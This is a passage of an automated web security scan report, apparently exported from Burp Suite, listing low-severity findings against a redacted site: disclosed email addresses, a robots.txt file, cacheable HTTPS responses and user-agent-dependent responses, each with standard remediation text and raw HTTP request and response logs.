+Server: redacted +Cf-Ray: 719878719aa608a5-SEA + +https://example.com
    + +
    + +

    Email addresses disclosed

    +/redacted + +

    Issue detail:

    +
    +The following email addresses were disclosed in the response:
    • privacy@redacted.com
    • support@redacted.com
    • u81F3contact@xijiabrainmap.com
    • u81F3support@xijiabrainmap.com
    • u8FC7contact@xijiabrainmap.com
    +
    + +

    +Issue background +

    +
    +

    The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

    +

    However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organization's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

    +
    + +

    +Issue remediation +

    +
    +

    Consider removing any email addresses that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

    +

    To reduce the quantity of spam sent to anonymous mailbox addresses, consider hiding the email address and instead providing a form that generates the email server-side, protected by a CAPTCHA if necessary.

    +
    + +

    References

    + + +

    Vulnerability classifications

    + + +

    Request:

    +
    GET /redacted HTTP/2 +Host: https://example.com +Cookie: __cfruid=8d467a9836d19fd26dfe28fbf19907453cba442d-1654930838 +sec-ch-ua: +sec-ch-ua-mobile: ?0 +Accept: */* +sec-ch-ua-platform: +Accept-Encoding: gzip, deflate +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +Connection: close +Cache-Control: max-age=0 + +
    +

    Response:

    +
    HTTP/2 200 OK +Date: Sat, 11 Jun 2022 07:01:40 GMT +Content-Type: application/javascript +Cf-Bgj: minify +Cf-Polished: origSize=2292583 +Cache-Control: public, max-age=3600, s-maxage=3600 +Content-Security-Policy: default-src 'none'; base-uri 'self'; media-src 'self'; script-src 'self' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; worker-src 'self' blob:; img-src 'self'; font-src 'self'; manifest-src 'self'; connect-src 'self'; frame-ancestors 'none'; form-action 'self'; +Cross-Origin-Embedder-Policy: require-corp +Cross-Origin-Opener-Policy: same-origin +Etag: W/"625ded12-22fb67" +Last-Modified: Mon, 18 Apr 2022 22:58:26 GMT +Referrer-Policy: no-referrer +Strict-Transport-Security: max-age=63072000; includeSubDomains; preload +X-Content-Type-Options: nosniff +X-Dns-Prefetch-Control: off +X-Envoy-Upstream-Service-Time: 1 +X-Frame-Options: DENY +X-Xss-Protection: 1; mode=block +Cf-Cache-Status: HIT +Expect-Ct: max-age=604800, report-uri="https://redacted/redacted/beacon/expect-ct" +Report-To: {"endpoints":[{"url":"https:\/\/redacted.com\/report\/v3?s=bhtutj7FNAQJrPT0XV2e6Se1viu%2Bu1EgoA7kr7db2%2BAAicKCaiMX3jrhhcTv9eL2Fi5F2V5CwzUalIAfGUaeCGD6h2soxZ1zS3mxVWohIu%2F%2F5oAu1TkBUqOeAk8oyMG%2F%2FFYPrq9%2B"}],"group":"cf-nel","max_age":604800} +Nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} +Vary: Accept-Encoding +Server: redacted +Cf-Ray: 71987a0b0a6f681d-SEA + +https://example.com
    + +
    + +

    Email addresses disclosed

    +/redacted + +

    Issue detail:

    +
    +The following email address was disclosed in the response:
    • support@redacted.com
    +
    + +

    +Issue background +

    +
    +

    The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

    +

    However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organization's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

    +
    + +

    +Issue remediation +

    +
    +

    Consider removing any email addresses that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

    +

    To reduce the quantity of spam sent to anonymous mailbox addresses, consider hiding the email address and instead providing a form that generates the email server-side, protected by a CAPTCHA if necessary.

    +
    + +

    References

    + + +

    Vulnerability classifications

    + + +

    Request:

    +
    GET /redacted?94ef82ad72dfadb7b729 HTTP/2 +Host: https://example.com +Cookie: __cfruid=074289c7818d20a3c6748bac71c59f2e8bf6e439-1654931032 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Upgrade-Insecure-Requests: 1 +Accept-Encoding: gzip, deflate +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +Connection: close +Cache-Control: max-age=0 + +
    +

    Response:

    +
    HTTP/2 200 OK +Date: Sat, 11 Jun 2022 07:03:52 GMT +Content-Type: application/javascript +Cf-Bgj: minify +Cf-Polished: origSize=583995 +Cache-Control: public, max-age=3600, s-maxage=3600 +Content-Security-Policy: default-src 'none'; base-uri 'self'; media-src 'self'; script-src 'self' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; worker-src 'self' blob:; img-src 'self'; font-src 'self'; manifest-src 'self'; connect-src 'self'; frame-ancestors 'none'; form-action 'self'; +Cross-Origin-Embedder-Policy: require-corp +Cross-Origin-Opener-Policy: same-origin +Etag: W/"625ded12-8e93b" +Last-Modified: Mon, 18 Apr 2022 22:58:26 GMT +Referrer-Policy: no-referrer +Strict-Transport-Security: max-age=63072000; includeSubDomains; preload +X-Content-Type-Options: nosniff +X-Dns-Prefetch-Control: off +X-Envoy-Upstream-Service-Time: 1 +X-Frame-Options: DENY +X-Xss-Protection: 1; mode=block +Cf-Cache-Status: HIT +Age: 198 +Expect-Ct: max-age=604800, report-uri="https://redacted/redacted/beacon/expect-ct" +Report-To: {"endpoints":[{"url":"https:\/\/redacted.com\/report\/v3?s=OMuLXOAyGzl4KTZKDoq8FKklHYnVo2pq7HUhdcO4mTwQ7WoSmyc5B76gc29NAmDTEwkY94AhoS9am1UmhteJug60L9%2BCP4kVpFa%2F8qtW44bT9uncd2%2BNpX700x1%2FSJImbVfAmeXB"}],"group":"cf-nel","max_age":604800} +Nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} +Vary: Accept-Encoding +Server: redacted +Cf-Ray: 71987d4c1e4960bf-SEA + +https://example.com
    + +
    +
    + +
    +
    + +

    Robots.txt file

    +/robots.txt + +

    Issue detail:

    +
    +The web server contains a robots.txt file. +
    + +

    +Issue background +

    +
    +

    The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site that robots are allowed, or not allowed, to crawl and index.

    +

    The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

    +
    + +

    +Issue remediation +

    +
    +

    The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honor the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorized access.

    +
    + +

    Vulnerability classifications

    + + +

    Request:

    +
    GET /robots.txt HTTP/1.1 +Host: https://example.com +Accept-Encoding: gzip, deflate +Accept: */* +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +Connection: close +Cache-Control: max-age=0 + +
    +

    Response:

    +
    HTTP/1.1 200 OK +Date: Sat, 11 Jun 2022 07:03:58 GMT +Content-Type: text/plain +Connection: close +last-modified: Mon, 18 Apr 2022 22:57:57 GMT +etag: W/"625decf5-43" +cross-origin-opener-policy: same-origin +cross-origin-embedder-policy: require-corp +content-security-policy: default-src 'none'; base-uri 'self'; media-src 'self'; script-src 'self' static.redactedinsights.com 'unsafe-eval' https://*.smartlook.com https://*.smartlook.cloud; style-src 'self' 'unsafe-inline'; worker-src 'self' blob:; img-src 'self'; font-src 'self'; manifest-src 'self'; connect-src 'self' https://*.smartlook.com https://*.smartlook.cloud; frame-ancestors 'none'; form-action 'self'; +cache-control: no-store +x-envoy-upstream-service-time: 1 +x-content-type-options: nosniff +x-frame-options: DENY +strict-transport-security: max-age=63072000; includeSubDomains; preload +x-xss-protection: 1; mode=block +referrer-policy: no-referrer +x-dns-prefetch-control: off +CF-Cache-Status: MISS +Expect-CT: max-age=604800, report-uri="https://redacted/redacted/beacon/expect-ct" +Report-To: {"endpoints":[{"url":"https:\/\/redacted.com\/report\/v3?s=ynnvsK4T2prb16%2Fo3RPBv0jEAiLb7OGY1NTq2ExfJILS8vae2%2B4X79suO6i7bf5AmymMXmPcqotnf%2FEytPM9Tde8UN9dYIBNm%2BlOenSRurJxBX1SFBkQivzEPfqMR3b16SbatiYw"}],"group":"cf-nel","max_age":604800} +NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} +Vary: Accept-Encoding +Set-Cookie: __cfruid=7b3900cfcdaf23aa1f227837917f50cb19399621-1654931038; path=/; domain=.redacted.com; HttpOnly; Secure; SameSite=None +Server: redacted +CF-RAY: 71987d6f3a8c0899-SEA +Content-Length: 67 + +# https://www.robotstxt.org/robotstxt.html +User-agent: * +Disallow: +
    + +
    +
    + +
    +
    + +

    Cacheable HTTPS response

    +/ + +

    Issue detail:

    +
    +This issue was found in multiple locations under the reported path. +
    + +

    +Issue background +

    +
    +

    Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

    +
    + +

    +Issue remediation +

    +
    +

    Applications should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

    +
      +
    • Cache-control: no-store
    • Pragma: no-cache
    +
    + +

    References

    + + +

    Vulnerability classifications

    + + +

    Request 1:

    +
    POST /redacted HTTP/2 +Host: https://example.com +Cookie: __cfruid=239b7646d8e83ceff3a082b1f62dad581f4af8c3-1654931034 +Origin: https://example.com +Accept: */* +content-type: application/json +Accept-Encoding: gzip, deflate +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +Connection: close +Cache-Control: max-age=0 +Content-Length: 5077 + +https://example.com
    +

    Response 1:

    +
    HTTP/2 200 OK +Date: Sat, 11 Jun 2022 07:03:54 GMT +Content-Type: text/plain +Access-Control-Allow-Origin: https://example.com +Access-Control-Allow-Methods: POST,OPTIONS +Access-Control-Max-Age: 86400 +Vary: Origin +Access-Control-Allow-Credentials: true +Server: redacted +Cf-Ray: 71987d577be960bf-SEA +X-Frame-Options: DENY +X-Content-Type-Options: nosniff + +
    +

    Request 2:

    +
    POST /redacted HTTP/2 +Host: https://example.com +Cookie: __cfruid=fff14e8fa4018dd72cbb80e5cd5b011a7248f150-1654930970 +Origin: https://example.com +sec-ch-ua: +sec-ch-ua-mobile: ?0 +Accept: */* +sec-ch-ua-platform: +content-type: application/json +Accept-Encoding: gzip, deflate +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +Connection: close +Cache-Control: max-age=0 +Content-Length: 5379 + +https://example.com
    +

    Response 2:

    +
    HTTP/2 200 OK +Date: Sat, 11 Jun 2022 07:02:50 GMT +Content-Type: text/plain +Access-Control-Allow-Origin: https://example.com +Access-Control-Allow-Methods: POST,OPTIONS +Access-Control-Max-Age: 86400 +Vary: Origin +Access-Control-Allow-Credentials: true +Server: redacted +Cf-Ray: 71987bc429b739c0-SEA +X-Frame-Options: DENY +X-Content-Type-Options: nosniff + +
    +

    Request 3:

    +
    POST /redacted HTTP/2 +Host: https://example.com +Cookie: __cfruid=6eb94ef0c78d0776ac6d858be948c98a942e2928-1654931030 +Origin: https://example.com +Accept: */* +content-type: application/json +Accept-Encoding: gzip, deflate +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 +Connection: close +Cache-Control: max-age=0 +Content-Length: 3791 + +https://example.com
    +

    Response 3:

    +
    HTTP/2 200 OK +Date: Sat, 11 Jun 2022 07:03:51 GMT +Content-Type: text/plain +Access-Control-Allow-Origin: https://example.com +Access-Control-Allow-Methods: POST,OPTIONS +Access-Control-Max-Age: 86400 +Vary: Origin +Access-Control-Allow-Credentials: true +Server: redacted +Cf-Ray: 71987d40f85860bf-SEA +X-Frame-Options: DENY +X-Content-Type-Options: nosniff + +
    + +
    +
    + +
    +
    + +

    User agent-dependent response

    +/redacted + +

    +Issue description +

    +
    +

    Application responses may depend systematically on the value of the User-Agent header in requests. This behavior does not itself constitute a security vulnerability, but may point towards additional attack surface within the application, which may contain vulnerabilities.

    +

    This behavior often arises because applications provide different user interfaces for desktop and mobile users. Mobile interfaces have often been less thoroughly tested for vulnerabilities such as cross-site scripting, and often have simpler authentication and session handling mechanisms that may contain problems that are not present in the full interface.

    +

    To review the interface provided by the alternate User-Agent header, you can configure a match/replace rule in Burp Proxy to modify the User-Agent header in all requests, and then browse the application in the normal way using your normal browser.

    +
    + +

    Vulnerability classifications

    + + +

    Request 1:

    +
    GET /redacted?94ef82ad72dfadb7b729 HTTP/2 +Host: https://example.com +Cookie: __cfruid=d75817bc7ad6710ac75db6ba48f6fc37f6551137-1654930833 +sec-ch-ua: +sec-ch-ua-mobile: ?0 +Accept: */* +sec-ch-ua-platform: +Accept-Encoding: gzip, deflate +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 + +Connection: close +Cache-Control: max-age=0 + +
    +

    Response 1:

    +
    HTTP/2 429 Too Many Requests +Date: Sat, 11 Jun 2022 07:32:34 GMT +Content-Type: application/json +Retry-After: 3006 +Cache-Control: no-cache +Expect-Ct: max-age=604800, report-uri="https://redacted/redacted/beacon/expect-ct" +Report-To: {"endpoints":[{"url":"https:\/\/redacted.com\/report\/v3?s=RJ%2FLblvlEwFsDazt1ays223SPw4TUGQ6m6yNvZPbNTooTY2tWTbj7PoXF4z2nI1sfyLLPN7%2Fo2tekNO0e4Lb47%2FBuPB8EeUhnxfCNBELB9uMVYQ3EQnmpN1TLj0fz7apA2dlQaL2"}],"group":"cf-nel","max_age":604800} +Nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} +Vary: Accept-Encoding +Server: redacted +Cf-Ray: 7198a750787a27ee-SEA + +https://example.com +
    +

    Request 2:

    +
    GET /redacted?94ef82ad72dfadb7b729 HTTP/2 +Host: https://example.com +Cookie: __cfruid=5deb9f366c412f14053591956654f073b61e26e8-1654934727 +sec-ch-ua: +sec-ch-ua-mobile: ?0 +Accept: */* +sec-ch-ua-platform: +Accept-Encoding: gzip, deflate +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3 + +Connection: close +Cache-Control: max-age=0 + +
    +

    Response 2:

    +
    HTTP/2 200 OK +Date: Sat, 11 Jun 2022 08:05:28 GMT +Content-Type: application/javascript +Cf-Bgj: minify +Cf-Polished: origSize=1056677 +Cache-Control: public, max-age=3600, s-maxage=3600 +Content-Security-Policy: default-src 'none'; base-uri 'self'; media-src 'self'; script-src 'self' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; worker-src 'self' blob:; img-src 'self'; font-src 'self'; manifest-src 'self'; connect-src 'self'; frame-ancestors 'none'; form-action 'self'; +Cross-Origin-Embedder-Policy: require-corp +Cross-Origin-Opener-Policy: same-origin +Etag: W/"625ded12-101fa5" +Last-Modified: Mon, 18 Apr 2022 22:58:26 GMT +Referrer-Policy: no-referrer +Strict-Transport-Security: max-age=63072000; includeSubDomains; preload +X-Content-Type-Options: nosniff +X-Dns-Prefetch-Control: off +X-Envoy-Upstream-Service-Time: 4 +X-Frame-Options: DENY +X-Xss-Protection: 1; mode=block +Cf-Cache-Status: HIT +Age: 25 +Expect-Ct: max-age=604800, report-uri="https://redacted/redacted/beacon/expect-ct" +Report-To: {"endpoints":[{"url":"https:\/\/redacted.com\/report\/v3?s=YLtpwWxvA39%2BiQj%2BhHipVuV%2B4hDnBSau%2FCOvAtRkCtpVrQ8VinDRCKIVREFPXFUKS0EATeaTrgURTt%2Bwgas6IU83S35K4mI2mMuKq%2BpDVo2ZCBwh%2Bd736Nz51OTzezKBlA%2Fr9H7Y"}],"group":"cf-nel","max_age":604800} +Nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} +Vary: Accept-Encoding +Set-Cookie: __cfruid=2edd2ade6bfe0221a0dda2561b62f8ecb736fba6-1654934728; path=/; domain=.redacted.com; HttpOnly; Secure; SameSite=None +Server: redacted +Cf-Ray: 7198d78809d508ff-SEA + +https://example.com
    + +
    + +

    User agent-dependent response

    +/redacted + +

    +Issue description +

    +
    +

    Application responses may depend systematically on the value of the User-Agent header in requests. This behavior does not itself constitute a security vulnerability, but may point towards additional attack surface within the application, which may contain vulnerabilities.

    +

    This behavior often arises because applications provide different user interfaces for desktop and mobile users. Mobile interfaces have often been less thoroughly tested for vulnerabilities such as cross-site scripting, and often have simpler authentication and session handling mechanisms that may contain problems that are not present in the full interface.

    +

    To review the interface provided by the alternate User-Agent header, you can configure a match/replace rule in Burp Proxy to modify the User-Agent header in all requests, and then browse the application in the normal way using your normal browser.

    +
    + +

    Vulnerability classifications

    + + +

    Request 1:

    +
    GET /redacted?94ef82ad72dfadb7b729 HTTP/2 +Host: https://example.com +Cookie: __cfruid=d75817bc7ad6710ac75db6ba48f6fc37f6551137-1654930833 +sec-ch-ua: +sec-ch-ua-mobile: ?0 +Accept: */* +sec-ch-ua-platform: +Accept-Encoding: gzip, deflate +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 + +Connection: close +Cache-Control: max-age=0 + +
    +

    Response 1:

    +
    HTTP/2 429 Too Many Requests +Date: Sat, 11 Jun 2022 08:09:22 GMT +Content-Type: application/json +Retry-After: 797 +Cache-Control: no-cache +Expect-Ct: max-age=604800, report-uri="https://redacted/redacted/beacon/expect-ct" +Report-To: {"endpoints":[{"url":"https:\/\/redacted.com\/report\/v3?s=yKrg5BohMh0gtqakk8YPrEBpg7HBfjTL2z8btjXKdrOKvapgujhdDesRNuCm5q0H2n4AQ1Iv8ecdLGmy0L5ZGCLfuOKl%2FLSuv5RF1kmonPxQgGwuxMDV34LaBSJ0sxZNEKWYMMDG"}],"group":"cf-nel","max_age":604800} +Nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} +Vary: Accept-Encoding +Server: redacted +Cf-Ray: 7198dd3cce8b13aa-SEA + +https://example.com +
    +

    Request 2:

    +
    GET /redacted?94ef82ad72dfadb7b729 HTTP/2 +Host: https://example.com +Cookie: __cfruid=d75817bc7ad6710ac75db6ba48f6fc37f6551137-1654930833 +sec-ch-ua: +sec-ch-ua-mobile: ?0 +Accept: */* +sec-ch-ua-platform: +Accept-Encoding: gzip, deflate +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3 + +Connection: close +Cache-Control: max-age=0 + +
    +

    Response 2:

    +
    HTTP/2 429 Too Many Requests +Date: Sat, 11 Jun 2022 08:19:14 GMT +Content-Type: application/json +Retry-After: 2842 +Cache-Control: no-cache +Expect-Ct: max-age=604800, report-uri="https://redacted/redacted/beacon/expect-ct" +Report-To: {"endpoints":[{"url":"https:\/\/redacted.com\/report\/v3?s=f34GPKSkR279Sg8xQQ6EYiUhpgsWheW78Jr9xSe7ZgL3K3Qp1nivcC4%2BUDyE%2Fz1n6zWSGCzy1%2BIdsUrCmGOL41mRR2WAXanK8bnPeYFPAZLHFwEWs1KZf%2B4%2BowfhtuP8w4rwdhDE"}],"group":"cf-nel","max_age":604800} +Nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} +Vary: Accept-Encoding +Server: redacted +Cf-Ray: 7198ebb16865e38e-SEA + +https://example.com +
    + +
    + +

    User agent-dependent response

    +/redacted + +

    +Issue description +

    +
    +

    Application responses may depend systematically on the value of the User-Agent header in requests. This behavior does not itself constitute a security vulnerability, but may point towards additional attack surface within the application, which may contain vulnerabilities.

    +

    This behavior often arises because applications provide different user interfaces for desktop and mobile users. Mobile interfaces have often been less thoroughly tested for vulnerabilities such as cross-site scripting, and often have simpler authentication and session handling mechanisms that may contain problems that are not present in the full interface.

    +

    To review the interface provided by the alternate User-Agent header, you can configure a match/replace rule in Burp Proxy to modify the User-Agent header in all requests, and then browse the application in the normal way using your normal browser.

    +
    + +

    Vulnerability classifications

    + + +

    Request 1:

    +
    GET /redacted?94ef82ad72dfadb7b729 HTTP/2 +Host: https://example.com +Cookie: __cfruid=d75817bc7ad6710ac75db6ba48f6fc37f6551137-1654930833 +sec-ch-ua: +sec-ch-ua-mobile: ?0 +Accept: */* +sec-ch-ua-platform: +Accept-Encoding: gzip, deflate +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 + +Connection: close +Cache-Control: max-age=0 + +
    +

    Response 1:

    +
    HTTP/2 429 Too Many Requests +Date: Sat, 11 Jun 2022 09:20:53 GMT +Content-Type: application/json +Retry-After: 2818 +Cache-Control: no-cache +Expect-Ct: max-age=604800, report-uri="https://redacted/redacted/beacon/expect-ct" +Report-To: {"endpoints":[{"url":"https:\/\/redacted.com\/report\/v3?s=Zs8esUH4FsawFLIKwTgA41O6gHo8yk6xjp5AfOcZakslERBcR8g2iDrS6ZX8Nh%2FNaUCub0RyvNUUKrI9lMnTKvzp0kZ%2FqnlkypZpJ8s8oSkusBnbwAE9wR7DEvlbclyt%2BpvjHEb2"}],"group":"cf-nel","max_age":604800} +Nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} +Vary: Accept-Encoding +Server: redacted +Cf-Ray: 719945feec8930b3-SEA + +https://example.com +
    +

    Request 2:

    +
    GET /redacted?94ef82ad72dfadb7b729 HTTP/2 +Host: https://example.com +Cookie: __cfruid=d75817bc7ad6710ac75db6ba48f6fc37f6551137-1654930833 +sec-ch-ua: +sec-ch-ua-mobile: ?0 +Accept: */* +sec-ch-ua-platform: +Accept-Encoding: gzip, deflate +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3 + +Connection: close +Cache-Control: max-age=0 + +
    +

    Response 2:

    +
    HTTP/2 429 Too Many Requests +Date: Sat, 11 Jun 2022 09:59:52 GMT +Content-Type: application/json +Retry-After: 469 +Cache-Control: no-cache +Expect-Ct: max-age=604800, report-uri="https://redacted/redacted/beacon/expect-ct" +Report-To: {"endpoints":[{"url":"https:\/\/redacted.com\/report\/v3?s=XfhO0F6GUs3XPeA%2FQtW7DeE9yPaC%2BR2UgUQ9wKTfCiIE65OhVd7yI6R0mrESv%2Fwvi%2FZgXQwu4qJd4sW7E7Q%2FJXYSzMsoL6UrFvEF7Ol07igCNqq8aT92HUCanVvTumb1WH1dRyfw"}],"group":"cf-nel","max_age":604800} +Nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} +Vary: Accept-Encoding +Server: redacted +Cf-Ray: 71997f197f2408ad-SEA + +https://example.com +
    + +
    + +

    User agent-dependent response

    +/redacted + +

    +Issue description +

    +
    +

    Application responses may depend systematically on the value of the User-Agent header in requests. This behavior does not itself constitute a security vulnerability, but may point towards additional attack surface within the application, which may contain vulnerabilities.

    +

    This behavior often arises because applications provide different user interfaces for desktop and mobile users. Mobile interfaces have often been less thoroughly tested for vulnerabilities such as cross-site scripting, and often have simpler authentication and session handling mechanisms that may contain problems that are not present in the full interface.

    +

    To review the interface provided by the alternate User-Agent header, you can configure a match/replace rule in Burp Proxy to modify the User-Agent header in all requests, and then browse the application in the normal way using your normal browser.

    +
    + +

    Vulnerability classifications

    + + +

    Request 1:

    +
    GET /redacted?94ef82ad72dfadb7b729 HTTP/2 +Host: https://example.com +Cookie: __cfruid=d75817bc7ad6710ac75db6ba48f6fc37f6551137-1654930833 +sec-ch-ua: +sec-ch-ua-mobile: ?0 +Accept: */* +sec-ch-ua-platform: +Accept-Encoding: gzip, deflate +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 + +Connection: close +Cache-Control: max-age=0 + +
    +

    Response 1:

    +
    HTTP/2 429 Too Many Requests +Date: Sat, 11 Jun 2022 08:10:07 GMT +Content-Type: application/json +Retry-After: 752 +Cache-Control: no-cache +Expect-Ct: max-age=604800, report-uri="https://redacted/redacted/beacon/expect-ct" +Report-To: {"endpoints":[{"url":"https:\/\/redacted.com\/report\/v3?s=q4E1umE2icia9bteAeOMZBe7zKjDpnySIZ3kaJ%2BC8T09V5bUa0tjbLZPUSyo0fwf4kgC3wbR9hyBrsTtHIj22bQjmrhdDMyFIT0C4soGiEAwN8b8pLdFLHEaPPmgU%2Bxdqx2XR5da"}],"group":"cf-nel","max_age":604800} +Nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} +Vary: Accept-Encoding +Server: redacted +Cf-Ray: 7198de55ed5013aa-SEA + +https://example.com +
    +

    Request 2:

    +
    GET /redacted?94ef82ad72dfadb7b729 HTTP/2 +Host: https://example.com +Cookie: __cfruid=d75817bc7ad6710ac75db6ba48f6fc37f6551137-1654930833 +sec-ch-ua: +sec-ch-ua-mobile: ?0 +Accept: */* +sec-ch-ua-platform: +Accept-Encoding: gzip, deflate +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3 + +Connection: close +Cache-Control: max-age=0 + +
    +

    Response 2:

    +
    HTTP/2 429 Too Many Requests +Date: Sat, 11 Jun 2022 08:19:26 GMT +Content-Type: application/json +Retry-After: 2831 +Cache-Control: no-cache +Expect-Ct: max-age=604800, report-uri="https://redacted/redacted/beacon/expect-ct" +Report-To: {"endpoints":[{"url":"https:\/\/redacted.com\/report\/v3?s=PaCCX51GD5LQcfV39thxYDFqKDTkny2s8t%2FpjyHlomBbTIu45mh5i1fp20%2FrmtQB5KLSA8y1RZNx5uXRsjD9OqDJg%2F7YVi%2Fa5svxPlnvdsQqZ1Ki7dHd5fRgvjo5aeBSeZU7K%2Ba%2B"}],"group":"cf-nel","max_age":604800} +Nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} +Vary: Accept-Encoding +Server: redacted +Cf-Ray: 7198ebfbfb12e38e-SEA + +https://example.com +
    + +
    + +

    User agent-dependent response

    +/redacted + +

    +Issue description +

    +
    +

    Application responses may depend systematically on the value of the User-Agent header in requests. This behavior does not itself constitute a security vulnerability, but may point towards additional attack surface within the application, which may contain vulnerabilities.

    +

    This behavior often arises because applications provide different user interfaces for desktop and mobile users. Mobile interfaces have often been less thoroughly tested for vulnerabilities such as cross-site scripting, and often have simpler authentication and session handling mechanisms that may contain problems that are not present in the full interface.

    +

    To review the interface provided by the alternate User-Agent header, you can configure a match/replace rule in Burp Proxy to modify the User-Agent header in all requests, and then browse the application in the normal way using your normal browser.

    +
    + +

    Vulnerability classifications

    + + +

    Request 1:

    +
    GET /redacted?94ef82ad72dfadb7b729 HTTP/2 +Host: https://example.com +Cookie: __cfruid=d75817bc7ad6710ac75db6ba48f6fc37f6551137-1654930833 +sec-ch-ua: +sec-ch-ua-mobile: ?0 +Accept: */* +sec-ch-ua-platform: +Accept-Encoding: gzip, deflate +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 + +Connection: close +Cache-Control: max-age=0 + +
    +

    Response 1:

    +
